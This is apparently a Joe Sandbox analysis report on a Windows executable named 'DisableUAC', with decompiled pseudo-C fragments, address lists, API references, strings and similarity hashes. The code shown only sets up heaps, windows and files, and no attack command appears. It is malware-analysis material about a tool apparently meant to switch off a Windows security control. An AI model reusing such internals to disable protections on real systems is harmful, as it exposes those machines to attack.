				_t221 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t142, _t172, _t221, _t339, _t340, 0x4001b13d, _t467, _t512), _t109, 0x4001cc90, _t142);
				_t143 =  *0x4001d660; // 0x0
				_t468 =  *0x4001cc20; // 0x1c0860
				_t223 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t143, _t172, _t223, _t339, _t340, 0x4001b13d, _t468, _t512), _t109, 0x4001cb20, _t143);
				_t144 =  *0x4001d660; // 0x0
				_t469 =  *0x4001cc20; // 0x1c0860
				_t225 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t144, _t172, _t225, _t339, _t340, 0x4001b13d, _t469, _t512), _t109, 0x4001cbe0, _t144);
				_t145 =  *0x4001d660; // 0x0
				_t470 =  *0x4001cc20; // 0x1c0860
				_t227 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t145, _t172, _t227, _t339, _t340, 0x4001b13d, _t470, _t512), _t109, 0x4001cc40, _t145);
				_t146 =  *0x4001d660; // 0x0
				_t471 =  *0x4001cc20; // 0x1c0860
				_t229 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t146, _t172, _t229, _t339, _t340, 0x4001b13d, _t471, _t512), _t109, 0x4001cbd8, _t146);
				_t147 =  *0x4001d660; // 0x0
				_t472 =  *0x4001cc20; // 0x1c0860
				_t231 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t147, _t172, _t231, _t339, _t340, 0x4001b13d, _t472, _t512), _t109, 0x4001cc60, _t147);
				_t148 =  *0x4001d660; // 0x0
				_t473 =  *0x4001cc20; // 0x1c0860
				_t233 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t148, _t172, _t233, _t339, _t340, 0x4001b13d, _t473, _t512), _t109, 0x4001cc28, _t148);
				_t149 =  *0x4001d660; // 0x0
				_t474 =  *0x4001cc20; // 0x1c0860
				_t235 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t149, _t172, _t235, _t339, _t340, 0x4001b13d, _t474, _t512), _t109, 0x4001cc70, _t149);
				_t150 =  *0x4001d660; // 0x0
				_t475 =  *0x4001cc20; // 0x1c0860
				_t237 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t150, _t172, _t237, _t339, _t340, 0x4001b13d, _t475, _t512), _t109, 0x4001cb78, _t150);
				_t151 =  *0x4001d660; // 0x0
				_t476 =  *0x4001cc20; // 0x1c0860
				_t239 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t151, _t172, _t239, _t339, _t340, 0x4001b13d, _t476, _t512), _t109, 0x4001cb80, _t151);
				_t152 =  *0x4001d660; // 0x0
				_t477 =  *0x4001cc20; // 0x1c0860
				_t241 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t152, _t172, _t241, _t339, _t340, 0x4001b13d, _t477, _t512), _t109, 0x4001cc68, _t152);
				_t153 =  *0x4001d660; // 0x0
				_t478 =  *0x4001cc20; // 0x1c0860
				_t243 =  *0x4001caf8; // 0x1c4a70
				E000000011400145C0(E00000001140006160(_t107, _t109, _t112, _t153, _t172, _t243, _t339, _t340, 0x4001b13d, _t478, _t512), _t109, 0x4001cbd0, _t153);
				E0000000114000D59C(_t153, _t172);
				if (_t153 - 0x3c >= 0) goto 0x400019c6;
				_t327 =  *0x4001cc60; // 0x1c4f10
				_t245 =  *0x4001cc90; // 0x1c4e20
				_t84 = E00000001140009924(_t153, _t172, _t245, _t327, _t340, _t153);
				goto 0x40001b9b;
				 *0x4001cb10 = 0x4001b322;
				_t155 =  *0x4001cb10; // 0x14001b336
				 *0x4001cb28 =  *_t155;
				 *0x4001cb10 =  *0x4001cb10 + 4;
				_t157 =  *0x4001cb10; // 0x14001b336
				 *0x4001cb30 =  *_t157;
				 *0x4001cb10 =  *0x4001cb10 + 4;
				_t159 =  *0x4001cb10; // 0x14001b336
				 *0x4001cb38 =  *_t159;
				 *0x4001cb10 =  *0x4001cb10 + 4;
				_t161 =  *0x4001cb10; // 0x14001b336
				 *0x4001cb40 =  *_t161;
				 *0x4001cb10 =  *0x4001cb10 + 4;
				_t163 =  *0x4001cb10; // 0x14001b336
				_t164 =  *_t163;
				 *0x4001cb48 = _t164;
				 *0x4001cb10 =  *0x4001cb10 + 4;
				0x40010560(_t152, _t151, _t150, _t149, _t148, _t147, _t146, _t145, _t144, _t143, _t142, _t141, _t140, _t139, _t138, _t137, _t136, _t135, _t134, _t133, _t132, _t131, _t130, _t129, _t128, _t127, _t126);
				 *0x4001cb50 = _t164;
				_t247 =  *0x4001cb50; // 0x2370a30
				_t85 = E00000001140010620(_t84, _t109, _t247);
				_push( *0x4001cb30);
				_t526 =  *0x4001cb50; // 0x2370a30
				_t86 = E00000001140010620(_t85, _t109, _t526 + 4);
				_t528 =  *0x4001cb50; // 0x2370a30
				_t87 = E00000001140010620(_t86, _t109, _t528 + 8);
				_t530 =  *0x4001cb50; // 0x2370a30
				_t88 = E00000001140010620(_t87, _t109, _t530 + 0xc);
				_t532 =  *0x4001cb50; // 0x2370a30
				E00000001140010620(_t88, _t109, _t532 + 0x10);
				_t169 =  *0x4001d660; // 0x0
				_t252 =  *0x4001cb50; // 0x2370a30
				E000000011400145C0(E000000011400126A0(_t109, _t169, _t172, _t252, _t340, _t169), _t109, 0x4001ccb8, _t169);
				E0000000114000AE24();
				E000000011400144D0(_t169, 0x4001cc48, 0x4001b025,  *0x4001cb48);
				E000000011400144D0(_t169, 0x4001cc38, 0x4001b037,  *0x4001cb40);
				E000000011400144D0(_t169, 0x4001cbb8, 0x4001b03c,  *0x4001cb38);
				_push(1);
				_pop(_t338); // executed
				0x40006012(); // executed
				E0000000114000BB30(E00000001140002EAD, _t172, E00000001140002EAD); // executed
				E00000001140004F26(_t532 + 0x10);
				L1();
				E000000011400144A0();
				HeapDestroy(??);
				ExitProcess(??); // executed
				_t100 = E0000000114000B9CC(_t108); // executed
				E0000000114000BE90(_t100); // executed
				E0000000114000C514(E00000001140002EAD);
				E0000000114000D824(E00000001140002EAD, _t338); // executed
				E0000000114000EC54(); // executed
				FreeLibrary(??);
				E00000001140010804();
				_t106 = E00000001140010C50(E00000001140002EAD, _t338); // executed
				0x40011cdc(); // executed
				0x40010520(); // executed
				return _t106;
			}

0x140001018
0x140001020
0x140001025
0x140001039
0x14000103e
0x14000104f
0x140001056
0x140001060
0x140001065
0x14000106a
0x14000106f
0x140001074
0x140001079
0x14000107e
0x140001083
0x140001088
0x14000108d
0x140001092
0x140001097
0x14000109c
0x1400010a1
0x1400010a6
0x1400010ad
0x1400010d1
0x140001108
0x140001111
0x140001140
0x14000114d
0x140001154
0x140001178
0x14000118e
0x1400011ad
0x1400011be
0x1400011cc
0x1400011d1
0x1400011d8
0x1400011e3
0x1400011ea
0x1400011f1
0x1400011f3
0x140001201
0x140001207
0x140001216
0x140001217
0x14000122c
0x140001231
0x140001238
0x14000123a
0x140001241
0x140001246
0x140001247
0x140001255
0x140001256
0x140001267
0x14000126e
0x14000127f
0x140001284
0x140001291
0x140001298
0x1400012b6
0x1400012bb
0x1400012c8
0x1400012d9
0x1400012f7
0x1400012fc
0x140001309
0x14000131a
0x140001338
0x14000133d
0x14000134a
0x14000135b
0x140001379
0x14000137e
0x14000138b
0x14000139c
0x1400013ba
0x1400013bf
0x1400013cc
0x1400013dd
0x1400013fb
0x140001400
0x14000140d
0x14000141e
0x14000143c
0x140001441
0x14000144e
0x14000145f
0x14000147d
0x140001482
0x14000148f
0x1400014a0
0x1400014be
0x1400014c3
0x1400014d0
0x1400014e1
0x1400014ff
0x140001504
0x140001511
0x140001522
0x140001540
0x140001545
0x140001552
0x140001563
0x140001581
0x140001586
0x140001593
0x1400015a4
0x1400015c2
0x1400015c7
0x1400015d4
0x1400015e5
0x140001603
0x140001608
0x140001615
0x140001626
0x140001644
0x140001649
0x140001656
0x140001667
0x140001685
0x14000168a
0x140001697
0x1400016a8
0x1400016c6
0x1400016cb
0x1400016d8
0x1400016e9
0x140001707
0x14000170c
0x140001719
0x14000172a
0x140001748
0x14000174d
0x14000175a
0x14000176b
0x140001789
0x14000178e
0x14000179b
0x1400017ac
0x1400017ca
0x1400017cf
0x1400017dc
0x1400017ed
0x14000180b
0x140001810
0x14000181d
0x14000182e
0x14000184c
0x140001851
0x14000185e
0x14000186f
0x14000188d
0x140001892
0x14000189f
0x1400018b0
0x1400018ce
0x1400018d3
0x1400018e0
0x1400018f1
0x14000190f
0x140001914
0x140001921
0x140001932
0x140001950
0x140001955
0x140001962
0x140001973
0x140001991
0x140001996
0x1400019a2
0x1400019ae
0x1400019b5
0x1400019bc
0x1400019c1
0x1400019d0
0x1400019d7
0x1400019e1
0x1400019e8
0x1400019f0
0x1400019fa
0x140001a01
0x140001a09
0x140001a13
0x140001a1a
0x140001a22
0x140001a2c
0x140001a33
0x140001a3b
0x140001a42
0x140001a45
0x140001a4c
0x140001a5e
0x140001a63
0x140001a71
0x140001a78
0x140001a7d
0x140001a83
0x140001a95
0x140001aa0
0x140001ab2
0x140001abd
0x140001acf
0x140001ada
0x140001aec
0x140001af1
0x140001b08
0x140001b26
0x140001b2b
0x140001b41
0x140001b57
0x140001b6d
0x140001b72
0x140001b81
0x140001b82
0x140001b91
0x140001b96
0x140001b9b
0x140001ba0
0x140001bac
0x140001bb8
0x140001bc1
0x140001bc6
0x140001bcb
0x140001bd0
0x140001bd5
0x140001bda
0x140001bdf
0x140001be4
0x140001be9
0x140001bee
0x140001bf7

APIs

Part of subcall function 0000000140014440: HeapCreate.KERNEL32 ref: 000000014001444E
Part of subcall function 0000000140014440: HeapAlloc.KERNEL32 ref: 0000000140014481

Part of subcall function 00000001400116A4: memset.MSVCRT ref: 00000001400116B8
Part of subcall function 00000001400116A4: RegisterClassA.USER32 ref: 0000000140011714
Part of subcall function 00000001400116A4: CreateWindowExA.USER32 ref: 000000014001175D
Part of subcall function 00000001400116A4: RegisterWindowMessageA.USER32 ref: 0000000140011771
Part of subcall function 00000001400116A4: InitializeCriticalSection.KERNEL32 ref: 00000001400117D1

Part of subcall function 00000001400107EC: TlsAlloc.KERNEL32 ref: 00000001400107F0

Part of subcall function 0000000140010500: HeapCreate.KERNEL32 ref: 000000014001050E

Part of subcall function 000000014000EBFC: LoadLibraryA.KERNEL32 ref: 000000014000EC07
Part of subcall function 000000014000EBFC: GetProcAddress.KERNEL32 ref: 000000014000EC23

Part of subcall function 000000014000D844: LoadIconA.USER32 ref: 000000014000D897
Part of subcall function 000000014000D844: LoadCursorA.USER32 ref: 000000014000D8AB

Part of subcall function 000000014000C484: InitializeCriticalSection.KERNEL32 ref: 000000014000C48F
Part of subcall function 000000014000C484: GetStockObject.GDI32 ref: 000000014000C49A
Part of subcall function 000000014000C484: memset.MSVCRT ref: 000000014000C4EC
Part of subcall function 000000014000C484: InitCommonControlsEx.COMCTL32 ref: 000000014000C506

Part of subcall function 00000001400098E8: memset.MSVCRT ref: 00000001400098F7
Part of subcall function 00000001400098E8: InitCommonControlsEx.COMCTL32 ref: 0000000140009911
Part of subcall function 00000001400098E8: CoInitialize.OLE32 ref: 0000000140009919

Part of subcall function 000000014000C05C: HeapFree.KERNEL32 ref: 000000014000C0A6
Part of subcall function 000000014000C05C: HeapFree.KERNEL32 ref: 000000014000C0C7
Part of subcall function 000000014000C05C: HeapFree.KERNEL32 ref: 000000014000C0D9

Part of subcall function 000000014000BF50: HeapAlloc.KERNEL32 ref: 000000014000BF82
Part of subcall function 000000014000BF50: HeapAlloc.KERNEL32 ref: 000000014000BF9D

Part of subcall function 0000000140013FEC: HeapAlloc.KERNEL32 ref: 0000000140014036
Part of subcall function 0000000140013FEC: memset.MSVCRT ref: 000000014001406C

Part of subcall function 0000000140011ECC: HeapAlloc.KERNEL32 ref: 0000000140011F05
Part of subcall function 0000000140011ECC: HeapAlloc.KERNEL32 ref: 0000000140011F36
Part of subcall function 0000000140011ECC: HeapAlloc.KERNEL32 ref: 0000000140011FA8

Part of subcall function 00000001400144D0: HeapAlloc.KERNEL32 ref: 0000000140014522

Part of subcall function 00000001400145C0: HeapAlloc.KERNEL32 ref: 0000000140014603

Part of subcall function 0000000140006160: strncmp.MSVCRT(?,?,0237083C,?,?,00000001400012EB), ref: 00000001400061E9
Part of subcall function 0000000140006160: strncpy.MSVCRT ref: 0000000140006282

Part of subcall function 00000001400145C0: HeapReAlloc.KERNEL32 ref: 0000000140014630

Part of subcall function 000000014000D59C: GetVersionExA.KERNEL32 ref: 000000014000D5BB
Part of subcall function 000000014000D59C: GetVersionExA.KERNEL32 ref: 000000014000D5F2

HeapDestroy.KERNEL32 ref: 0000000140001BAC
ExitProcess.KERNEL32 ref: 0000000140001BB8

Part of subcall function 0000000140009924: MessageBoxA.USER32 ref: 0000000140009957

Strings

*?\BFINOPSX, xrefs: 000000014000117D
.exe, xrefs: 0000000140001B5C

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Heap$Alloc$memset$CreateFreeInitializeLoad$CommonControlsCriticalInitMessageRegisterSectionVersionWindow$AddressClassCursorDestroyExitIconLibraryObjectProcProcessStockstrncmpstrncpy
String ID: *?\BFINOPSX$.exe
API String ID: 945028775-4085050618
Opcode ID: cd911282b5899d70e36e9235e270e94b6a31fbe3b14e2964417d48abe196eeff
Instruction ID: 0d4568ba93c4808c638766970d74e95f62d72778ac085447284635e258846b06
Opcode Fuzzy Hash: cd911282b5899d70e36e9235e270e94b6a31fbe3b14e2964417d48abe196eeff
Instruction Fuzzy Hash: D152C5B5A20A48D1FB03EBA3FC92BE92621A75DBD5F440416FE0D5B3B2DE3AC0558741

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000EBFC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 000000014000EC07
GetProcAddress.KERNEL32 ref: 000000014000EC23

Strings

msimg32.dll, xrefs: 000000014000EC00
AlphaBlend, xrefs: 000000014000EC19

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: AlphaBlend$msimg32.dll
API String ID: 2574300362-3639726679
Opcode ID: 09b09268d75052394d3063c192883025a32ab1576d6b128e3375901346a38a88
Instruction ID: ea59584e0cd7c58f1f16a691d57b7afeea545436324d04989f8dd446f0bec993
Opcode Fuzzy Hash: 09b09268d75052394d3063c192883025a32ab1576d6b128e3375901346a38a88
Instruction Fuzzy Hash: BCF0C2B4A51F0485FB0ADB27F8923D136A1AB0C3D8FD4001AB64A4B370EF3E81858701

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000C484 Relevance: 6.0, APIs: 4, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 28%

			E0000000114000C484(long long __rax, void* __rdx, intOrPtr _a8, intOrPtr _a12) {
				void* _t12;
				void* _t18;
				long long _t20;
				void* _t21;
				void* _t27;
				void* _t28;

				_t25 = __rdx;
				_t20 = __rax;
				InitializeCriticalSection(??);
				GetStockObject(??);
				_t1 = _t25 + 0xe; // 0x40
				 *0x4001d820 = __rax;
				E000000011400136D0(_t1, 0x32, _t18, __rax, _t21, __rdx, _t27, _t28, E0000000114000D0C0);
				 *0x4001d860 = _t20;
				E00000001140013750(0x68, _t20, _t21, 0x14000c430);
				r8d = 0x14000c438;
				 *0x4001d870 = _t20;
				_t12 = memset(??, ??, ??);
				_a8 = 8;
				_a12 = 0xb48;
				__imp__InitCommonControlsEx(); // executed
				return _t12;
			}

0x14000c484
0x14000c484
0x14000c48f
0x14000c49a
0x14000c4ac
0x14000c4af
0x14000c4b6
0x14000c4ce
0x14000c4d5
0x14000c4e1
0x14000c4e5
0x14000c4ec
0x14000c4f6
0x14000c4fe
0x14000c506
0x14000c510

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014000C48F
GetStockObject.GDI32 ref: 000000014000C49A

Part of subcall function 00000001400136D0: HeapAlloc.KERNEL32 ref: 00000001400136FC
Part of subcall function 00000001400136D0: HeapAlloc.KERNEL32 ref: 000000014001372A

Part of subcall function 0000000140013750: HeapAlloc.KERNEL32 ref: 000000014001376C

memset.MSVCRT ref: 000000014000C4EC
InitCommonControlsEx.COMCTL32 ref: 000000014000C506

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: AllocHeap$CommonControlsCriticalInitInitializeObjectSectionStockmemset
String ID:
API String ID: 3863164924-0
Opcode ID: 6567afa6ff09480376dfef619b5ade3a39db7d6a362806ae1cc2311b97e514e2
Instruction ID: f8b03a13d0bead73d5fb511c1f376574fb400f27bd47914bc3d6d7afa176ea8e
Opcode Fuzzy Hash: 6567afa6ff09480376dfef619b5ade3a39db7d6a362806ae1cc2311b97e514e2
Instruction Fuzzy Hash: 10013CB4222A4592E746EF52F8547D873A1F78C784F805116F38A0B6B5DF3EC11AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140011ECC Relevance: 5.1, APIs: 4, Instructions: 75
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E00000001140011ECC(signed long long __edx, signed long long __rax, long long __rbx, signed long long __rcx, void* __rdx, long long __rsi, long long __rbp, signed long long __r8, signed long long** __r9, long long _a8, long long _a16, long long _a24, intOrPtr _a40) {
				signed int _t38;
				signed long long _t53;
				signed long long _t56;
				void* _t67;
				signed long long* _t68;
				signed long long _t83;

				_t67 = __rdx;
				_t53 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t83 = __rcx;
				_t56 = __r8;
				r13d = __edx;
				E00000001140012028(__r8,  *__r9);
				_t4 = _t67 + 0x60; // 0x60
				r8d = _t4;
				HeapAlloc(??, ??, ??);
				_t68 = _t53;
				if (_t53 == 0) goto 0x40011fd7;
				_t47 =  <=  ? 1 : _a40;
				HeapAlloc(??, ??, ??); // executed
				_t68[1] = _t53;
				if (_t53 == 0) goto 0x40011fc3;
				 *_t68 =  *_t68 & 0x00000000;
				_t68[8] = _t68[8] & 0x00000000;
				_t68[8] = _t68[8] & 0x00000000;
				_t68[0xa] = _t68[0xa] & 0x00000000;
				_t68[7] =  <=  ? 1 : _a40;
				_t68[6] = _t83;
				_t68[7] = r13d;
				_t68[4] = _t56;
				_t68[9] = __r9;
				E00000001140014A24(_t53, _t56);
				if (_t53 == 0) goto 0x40011f7a;
				_t68[8] = _t68[8] | 0x00000002;
				_t21 = _t83 + 0x10; // 0x20
				r8d = 0x10000;
				_t22 = _t67 - 0xc; // 0x4
				r9d = _t22;
				E000000011400137E8(_t38, 0x10, _t53, _t53, _t56, _t21);
				_t68[0xb] = _t53;
				HeapAlloc(??, ??, ??);
				_t68[3] = _t53;
				 *((long long*)(_t53 + 8)) = 0x40019d38;
				 *__r9 = _t68;
				goto 0x40011fd7;
				return HeapFree(??, ??, ??);
			}

0x140011ecc
0x140011ecc
0x140011ecc
0x140011ed1
0x140011ed6
0x140011ee4
0x140011eed
0x140011ef0
0x140011ef3
0x140011f01
0x140011f01
0x140011f05
0x140011f0b
0x140011f11
0x140011f2c
0x140011f36
0x140011f3c
0x140011f43
0x140011f45
0x140011f49
0x140011f4d
0x140011f51
0x140011f59
0x140011f5c
0x140011f60
0x140011f64
0x140011f68
0x140011f6c
0x140011f74
0x140011f76
0x140011f7f
0x140011f84
0x140011f8a
0x140011f8a
0x140011f8e
0x140011f9d
0x140011fa8
0x140011fb5
0x140011fb9
0x140011fbd
0x140011fc1
0x140011ff2

APIs

Part of subcall function 0000000140012028: HeapFree.KERNEL32 ref: 0000000140012059
Part of subcall function 0000000140012028: HeapFree.KERNEL32 ref: 000000014001206C
Part of subcall function 0000000140012028: HeapFree.KERNEL32 ref: 0000000140012087
Part of subcall function 0000000140012028: HeapFree.KERNEL32 ref: 00000001400120A9

HeapAlloc.KERNEL32 ref: 0000000140011F05
HeapAlloc.KERNEL32 ref: 0000000140011F36
HeapAlloc.KERNEL32 ref: 0000000140011FA8
HeapFree.KERNEL32 ref: 0000000140011FCF

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: Heap$Free$Alloc
String ID:
API String ID: 3901518246-0
Opcode ID: cf06e5f737a263405d9b821e440426ac29a0ba54c5e0fbbe03e575f8ab1c2cbc
Instruction ID: d988e06b388bf30f3d99f4d5ce199f64c26be3c8c51a874d25b13b092f307e0d
Opcode Fuzzy Hash: cf06e5f737a263405d9b821e440426ac29a0ba54c5e0fbbe03e575f8ab1c2cbc
Instruction Fuzzy Hash: 44316872210B849AE716CB13E94079937A4FB8CBD4F884529EF4A4BF65CF3AD565C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400114F0 Relevance: 4.6, APIs: 3, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32 ref: 0000000140011527
memmove.MSVCRT ref: 00000001400115C7

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: FilePointermemmove
String ID:
API String ID: 2366752189-0
Opcode ID: ea48dc0e7420b3de95b00297780216c5c2694f7a92981eb837e49dad823e67e7
Instruction ID: d60717c86ea3e66dc81979fdc922323000c936c3ad70246a15db15c5d8a62f4c
Opcode Fuzzy Hash: ea48dc0e7420b3de95b00297780216c5c2694f7a92981eb837e49dad823e67e7
Instruction Fuzzy Hash: 7B314F76204A50C6DB15CF2AE1503ADB7A2F7C8BC8F548411EB8A4BB69D77AC841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140010FC0 Relevance: 4.6, APIs: 3, Instructions: 69
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 000000014001101A
CreateFileA.KERNEL32 ref: 000000014001104B
HeapAlloc.KERNEL32 ref: 0000000140011076

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CreateFile$AllocHeap
String ID:
API String ID: 2009486018-0
Opcode ID: e0d1492d277ee9b0bc3040a31d677eecd228b9d80fe2a34ef9e87f7f5f5cd4f7
Instruction ID: eaaafac0a1b92ae88f0354b004f885fea2ccb7b661ca6b8799298754020489f2
Opcode Fuzzy Hash: e0d1492d277ee9b0bc3040a31d677eecd228b9d80fe2a34ef9e87f7f5f5cd4f7
Instruction Fuzzy Hash: 9F314C31604B8085E7118F22A944796B7A5F78CBF4F484715EBB90BBE9CB7AC450CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140010820 Relevance: 4.5, APIs: 3, Instructions: 35
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strncpy.MSVCRT ref: 000000014001083A
strlen.MSVCRT ref: 000000014001084C
CreateDirectoryA.KERNEL32 ref: 0000000140010889

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CreateDirectorystrlenstrncpy
String ID:
API String ID: 2535372781-0
Opcode ID: e4b6b7f30544d06279d98e6f1510e0db153236c1245e7a34e4cd694f488084ce
Instruction ID: ba1b90c14b4d491d83ff41448b211cec1ee678862158b59577b5ad8fdb06b48a
Opcode Fuzzy Hash: e4b6b7f30544d06279d98e6f1510e0db153236c1245e7a34e4cd694f488084ce
Instruction Fuzzy Hash: C6016D3660D19482EB769616E0503F96791B79C7C8FD44121B7CD0B6A9EFBEC24ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400098E8 Relevance: 4.5, APIs: 3, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00000001400098F7
InitCommonControlsEx.COMCTL32 ref: 0000000140009911
CoInitialize.OLE32 ref: 0000000140009919

Memory Dump Source

Source File: 00000004.00000002.380219606.0000000140001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.380186845.0000000140000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380240255.0000000140016000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380249115.000000014001B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.380259531.000000014001E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_DisableUAC.jbxd

Similarity

API ID: CommonControlsInitInitializememset
String ID:
API String ID: 2179856907-0
Opcode ID: c90cfb0bdba857dc2a59b5129b4332abbeafb2093593bc78332af8707e155825
Instruction ID: 45614ec15ca8dfbf6ce8962801a864e76fad9c5655e9d353b39869423d6e64b3
Opcode Fuzzy Hash: c90cfb0bdba857dc2a59b5129b4332abbeafb2093593bc78332af8707e155825
Instruction Fuzzy Hash: 39E0E2B263558082E789AB22E89579EB260FB88708F846019F24B465A5CF39C65ACF00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000404D Relevance: 3.2, APIs: 2, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400108A0: GetTempPathA.KERNEL32 ref: 00000001400108CA
Part of subcall function 00000001400108A0: LoadLibraryA.KERNEL32 ref: 00000001400108D9
